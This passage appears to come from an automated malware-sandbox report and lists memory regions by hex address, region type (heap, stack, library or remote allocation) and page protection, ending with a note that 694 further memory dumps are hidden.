heap
page read and write
111D000
trusted library allocation
page execute and read and write
1B4E7A5B000
heap
page read and write
57A0000
trusted library allocation
page read and write
3B1F000
stack
page read and write
1200000
heap
page read and write
55D0000
trusted library allocation
page read and write
FE069FA000
stack
page read and write
1B4E7970000
heap
page read and write
5384000
trusted library allocation
page read and write
7FFAACC3C000
trusted library allocation
page execute and read and write
53F5000
trusted library allocation
page read and write
5C0E000
stack
page read and write
C73337B000
stack
page read and write
322E000
trusted library allocation
page read and write
1B490070000
trusted library allocation
page read and write
3DC7000
trusted library allocation
page read and write
7FFAACE60000
trusted library allocation
page read and write
C733E79000
stack
page read and write
1168000
heap
page read and write
1742000
trusted library allocation
page read and write
7FFAACD90000
trusted library allocation
page read and write
11DA000
heap
page read and write
1E167DF0000
trusted library allocation
page read and write
5890000
trusted library allocation
page read and write
56CE000
stack
page read and write
3B5E000
stack
page read and write
1E1675D0000
trusted library allocation
page read and write
7FFAACEB0000
trusted library allocation
page read and write
5880000
trusted library allocation
page execute and read and write
2C80000
heap
page execute and read and write
1B4E9980000
heap
page read and write
1E167673000
heap
page read and write
5CFD000
stack
page read and write
14D0000
heap
page read and write
5605000
trusted library allocation
page read and write
1E16CCE5000
heap
page read and write
C7338FE000
stack
page read and write
7FFAACB9B000
trusted library allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
116E000
stack
page read and write
1660000
trusted library allocation
page execute and read and write
1540000
trusted library allocation
page read and write
28FCBC0A000
heap
page read and write
3C9E000
stack
page read and write
1410000
heap
page read and write
3114000
trusted library allocation
page read and write
1E167F13000
heap
page read and write
3280000
trusted library allocation
page read and write
1E16CE20000
remote allocation
page read and write
5635000
trusted library allocation
page read and write
C73317C000
stack
page read and write
171D000
trusted library allocation
page execute and read and write
327C000
trusted library allocation
page read and write
55D4000
trusted library allocation
page read and write
69DE000
stack
page read and write
56E0000
trusted library allocation
page read and write
FF7000
heap
page read and write
32BC000
trusted library allocation
page read and write
5330000
trusted library section
page read and write
1B4E7A32000
heap
page read and write
4011000
trusted library allocation
page read and write
1B481B27000
trusted library allocation
page read and write
5DA2000
trusted library allocation
page read and write
6EE06000
unkown
page readonly
5D84000
trusted library allocation
page read and write
14F0000
heap
page read and write
1E16CA81000
trusted library allocation
page read and write
1B4901B3000
trusted library allocation
page read and write
563B000
trusted library allocation
page read and write
3E51000
trusted library allocation
page read and write
6FF6000
trusted library allocation
page read and write
38DE000
stack
page read and write
1E16765B000
heap
page read and write
1E167691000
heap
page read and write
1E1676A0000
heap
page read and write
7FFB226E5000
unkown
page readonly
1E167E15000
heap
page read and write
1450000
trusted library allocation
page execute and read and write
1B481ADE000
trusted library allocation
page read and write
1246000
heap
page read and write
5475DB7000
stack
page read and write
7060000
trusted library allocation
page execute and read and write
57A5000
trusted library allocation
page read and write
74A0000
heap
page read and write
1407000
trusted library allocation
page execute and read and write
55DB000
trusted library allocation
page read and write
13E0000
heap
page read and write
5CBD000
stack
page read and write
32F8000
trusted library allocation
page read and write
7FFAACB90000
trusted library allocation
page read and write
1B481B21000
trusted library allocation
page read and write
5630000
trusted library allocation
page read and write
5344000
trusted library section
page read and write
C732E7E000
unkown
page readonly
2BA0000
trusted library allocation
page read and write
33AD000
trusted library allocation
page read and write
1E16CCE7000
heap
page read and write
2C5E000
stack
page read and write
3230000
heap
page read and write
3290000
trusted library allocation
page read and write
3288000
trusted library allocation
page read and write
1B4E9430000
heap
page execute and read and write
563E000
trusted library allocation
page read and write
2C95000
trusted library allocation
page read and write
28FCBB70000
heap
page read and write
1405000
heap
page read and write
1E16CCC2000
heap
page read and write
33E2000
trusted library allocation
page read and write
28FCBE15000
heap
page read and write
1B48008B000
trusted library allocation
page read and write
16CE000
stack
page read and write
990000
unkown
page readonly
7FFAACD40000
trusted library allocation
page execute and read and write
C32000
unkown
page readonly
5300000
trusted library allocation
page read and write
1745000
trusted library allocation
page execute and read and write
1B4815F9000
trusted library allocation
page read and write
3120000
heap
page execute and read and write
31E2000
trusted library allocation
page read and write
1E16CBB0000
trusted library allocation
page read and write
547597E000
stack
page read and write
565D000
trusted library allocation
page read and write
3DDC000
stack
page read and write
1B4E79D7000
heap
page read and write
53F0000
trusted library allocation
page read and write
13DD000
trusted library allocation
page execute and read and write
13F6000
trusted library allocation
page execute and read and write
1670000
heap
page read and write
1E16CB50000
trusted library allocation
page read and write
FCB000
stack
page read and write
174B000
trusted library allocation
page execute and read and write
7FFB226C0000
unkown
page readonly
116E000
heap
page read and write
1B490010000
trusted library allocation
page read and write
1330000
heap
page read and write
5870000
heap
page execute and read and write
C7336FE000
stack
page read and write
1E167695000
heap
page read and write
5490000
heap
page read and write
1E16CBC0000
trusted library allocation
page read and write
C73307E000
unkown
page readonly
68DE000
stack
page read and write
5640000
heap
page read and write
1770000
trusted library allocation
page execute and read and write
7FFAACD20000
trusted library allocation
page read and write
321A000
trusted library allocation
page read and write
FE06CFE000
stack
page read and write
56F3000
heap
page read and write
5780000
trusted library allocation
page read and write
1B4815DD000
trusted library allocation
page read and write
2DB1000
trusted library allocation
page read and write
1E1674A0000
heap
page read and write
7FFB226D6000
unkown
page readonly
1E16CAA0000
trusted library allocation
page read and write
1E167622000
heap
page read and write
28FCBD70000
heap
page read and write
1E16CAD9000
trusted library allocation
page read and write
5476E4B000
stack
page read and write
C732977000
stack
page read and write
5DA5000
trusted library allocation
page read and write
1E16CCFC000
heap
page read and write
338B000
trusted library allocation
page read and write
1429000
heap
page read and write
1E16CC4F000
heap
page read and write
1430000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
1B4E9CCE000
heap
page read and write
1E16CC00000
heap
page read and write
3DB1000
trusted library allocation
page read and write
C733A7E000
unkown
page readonly
5D7E000
stack
page read and write
3240000
heap
page read and write
C73397E000
unkown
page readonly
574E000
stack
page read and write
5310000
trusted library allocation
page read and write
1110000
heap
page read and write
1B4E9360000
heap
page read and write
63AF000
stack
page read and write
1B4E94D0000
heap
page read and write
5346000
trusted library section
page read and write
13E8000
heap
page read and write
1E16CAC0000
trusted library allocation
page read and write
1110000
trusted library allocation
page read and write
1E16CC2C000
heap
page read and write
5850000
trusted library allocation
page read and write
338F000
trusted library allocation
page read and write
3294000
trusted library allocation
page read and write
1460000
heap
page read and write
18E0000
heap
page read and write
1714000
trusted library allocation
page read and write
1E16767D000
heap
page read and write
C733D7E000
unkown
page readonly
41C6000
trusted library allocation
page read and write
2C64000
trusted library allocation
page read and write
1E16CAC0000
trusted library allocation
page read and write
1B4E9AE0000
heap
page execute and read and write
1E167F1A000
heap
page read and write
2C67000
trusted library allocation
page read and write
655E000
stack
page read and write
11A5000
heap
page read and write
4131000
trusted library allocation
page read and write
180D000
stack
page read and write
1B4E7990000
heap
page read and write
7FFAACD62000
trusted library allocation
page read and write
5540000
heap
page execute and read and write
1850000
trusted library allocation
page read and write
1B481607000
trusted library allocation
page read and write
1E1686E0000
trusted library section
page readonly
1E16CBD0000
trusted library allocation
page read and write
1337000
stack
page read and write
5475FBE000
stack
page read and write
598E000
stack
page read and write
539E000
trusted library allocation
page read and write
563D000
trusted library allocation
page read and write
3EDC000
stack
page read and write
1E16CB50000
trusted library allocation
page read and write
3322000
trusted library allocation
page read and write
1B4E99BB000
heap
page read and write
5774000
trusted library allocation
page read and write
7FFAACB84000
trusted library allocation
page read and write
3452000
trusted library allocation
page read and write
28FCBC10000
heap
page read and write
2C60000
trusted library allocation
page read and write
1E1684A0000
trusted library allocation
page read and write
1E16E000000
heap
page read and write
115B000
trusted library allocation
page execute and read and write
5590000
trusted library section
page read and write
579D000
heap
page read and write
1E16CAB0000
trusted library allocation
page read and write
6EDF1000
unkown
page execute read
162E000
stack
page read and write
564E000
trusted library allocation
page read and write
DAB000
stack
page read and write
1B4E9C60000
heap
page read and write
69E0000
heap
page read and write
1B4E9C70000
heap
page read and write
7FFAACD70000
trusted library allocation
page execute and read and write
2BD0000
heap
page read and write
EF6000
stack
page read and write
137D000
stack
page read and write
379E000
stack
page read and write
B2B000
stack
page read and write
BEE000
stack
page read and write
4015000
trusted library allocation
page read and write
7FFAACCA0000
trusted library allocation
page execute and read and write
1E16CC61000
heap
page read and write
5476C4E000
stack
page read and write
2C98000
trusted library allocation
page read and write
7FFAACC36000
trusted library allocation
page read and write
6A22000
heap
page read and write
17CE000
stack
page read and write
1E1674C0000
heap
page read and write
7FFB226E2000
unkown
page readonly
2C1E000
stack
page read and write
1380000
heap
page read and write
1570000
trusted library allocation
page execute and read and write
1B4E7A59000
heap
page read and write
1E16CCC7000
heap
page read and write
7FFAACEC0000
trusted library allocation
page read and write
5940000
heap
page read and write
1113000
trusted library allocation
page execute and read and write
5779000
trusted library allocation
page read and write
120E000
heap
page read and write
1E1686A0000
trusted library section
page readonly
1B4E94E0000
heap
page read and write
C73327E000
unkown
page readonly
5790000
heap
page read and write
7FFAACC66000
trusted library allocation
page execute and read and write
C732D7B000
stack
page read and write
1713000
trusted library allocation
page execute and read and write
6E9E000
stack
page read and write
7FFAACE20000
trusted library allocation
page read and write
32A2000
trusted library allocation
page read and write
5476BCE000
stack
page read and write
13DA000
heap
page read and write
7FFAACE80000
trusted library allocation
page read and write
28FCBB60000
heap
page read and write
1E16CC42000
heap
page read and write
675E000
stack
page read and write
13FA000
trusted library allocation
page execute and read and write
1E16762B000
heap
page read and write
1380000
heap
page read and write
1146000
trusted library allocation
page execute and read and write
1B4E7A1A000
heap
page read and write
1E16CC8C000
heap
page read and write
1B4E9470000
trusted library allocation
page read and write
7FFAACDE0000
trusted library allocation
page read and write
52CE000
stack
page read and write
3306000
trusted library allocation
page read and write
544D000
stack
page read and write
13B8000
heap
page read and write
C7323FB000
stack
page read and write
13F0000
trusted library allocation
page read and write
C73407E000
stack
page read and write
7020000
trusted library allocation
page read and write
7FFAACC40000
trusted library allocation
page execute and read and write
31E5000
trusted library allocation
page read and write
54AE000
stack
page read and write
3274000
trusted library allocation
page read and write
1B4E9AE7000
heap
page execute and read and write
1E1676A2000
heap
page read and write
689E000
stack
page read and write
5670000
trusted library allocation
page read and write
7FFAACB83000
trusted library allocation
page execute and read and write
1E1675E0000
trusted library section
page read and write
123A000
stack
page read and write
1700000
trusted library allocation
page read and write
5840000
trusted library allocation
page execute and read and write
1780000
heap
page read and write
41BD000
trusted library allocation
page read and write
53C0000
trusted library allocation
page read and write
1550000
heap
page read and write
D1C000
unkown
page readonly
620E000
stack
page read and write
1E1686C0000
trusted library section
page readonly
14F5000
heap
page read and write
139F000
stack
page read and write
41F1000
trusted library allocation
page read and write
7FFAACE10000
trusted library allocation
page read and write
6C9F000
stack
page read and write
5620000
trusted library allocation
page read and write
28FCBE10000
heap
page read and write
1E167641000
heap
page read and write
665F000
stack
page read and write
590E000
stack
page read and write
1E1676B7000
heap
page read and write
7FFAACB82000
trusted library allocation
page read and write
645E000
stack
page read and write
1425000
heap
page read and write
1736000
trusted library allocation
page execute and read and write
1196000
heap
page read and write
13B0000
heap
page read and write
1860000
heap
page read and write
1E167F00000
heap
page read and write
3000000
heap
page read and write
C7339FE000
stack
page read and write
1E16CC5A000
heap
page read and write
577E000
trusted library allocation
page read and write
4159000
trusted library allocation
page read and write
53CE000
trusted library allocation
page read and write
1E168091000
trusted library allocation
page read and write
C73497E000
unkown
page readonly
323D000
trusted library allocation
page read and write
BA0000
heap
page read and write
1E16CBE0000
trusted library allocation
page read and write
15EE000
stack
page read and write
1B481761000
trusted library allocation
page read and write
32E9000
trusted library allocation
page read and write
5869000
trusted library allocation
page read and write
5860000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
1B4EA050000
heap
page read and write
1B481603000
trusted library allocation
page read and write
547613B000
stack
page read and write
1B4E9D40000
heap
page read and write
1E16CE20000
remote allocation
page read and write
1248000
heap
page read and write
7FFAACE30000
trusted library allocation
page read and write
C732B7E000
stack
page read and write
28FCDA90000
heap
page read and write
1E167713000
heap
page read and write
310E000
stack
page read and write
5636000
trusted library allocation
page read and write
5DA0000
trusted library allocation
page read and write
1E16CD05000
heap
page read and write
5651000
trusted library allocation
page read and write
5867000
trusted library allocation
page read and write
5476B8D000
stack
page read and write
13D4000
trusted library allocation
page read and write
14D6000
heap
page read and write
1E16CA60000
trusted library allocation
page read and write
1B4E7A12000
heap
page read and write
7FFB226E0000
unkown
page read and write
17CE000
stack
page read and write
C73437E000
unkown
page readonly
3278000
trusted library allocation
page read and write
1B4E7D40000
heap
page read and write
1E16CAC4000
trusted library allocation
page read and write
FE074FF000
stack
page read and write
7040000
trusted library allocation
page read and write
7050000
trusted library allocation
page read and write
56F0000
heap
page read and write
1B4E7960000
heap
page read and write
5990000
heap
page read and write
5475CF9000
stack
page read and write
5610000
heap
page read and write
5475BFD000
stack
page read and write
5628000
trusted library allocation
page read and write
1B4E93C0000
trusted library allocation
page read and write
1E1676FF000
heap
page read and write
140B000
trusted library allocation
page execute and read and write
2C9D000
trusted library allocation
page read and write
28FCBBA9000
heap
page read and write
There are 694 hidden memdumps, click here to show them.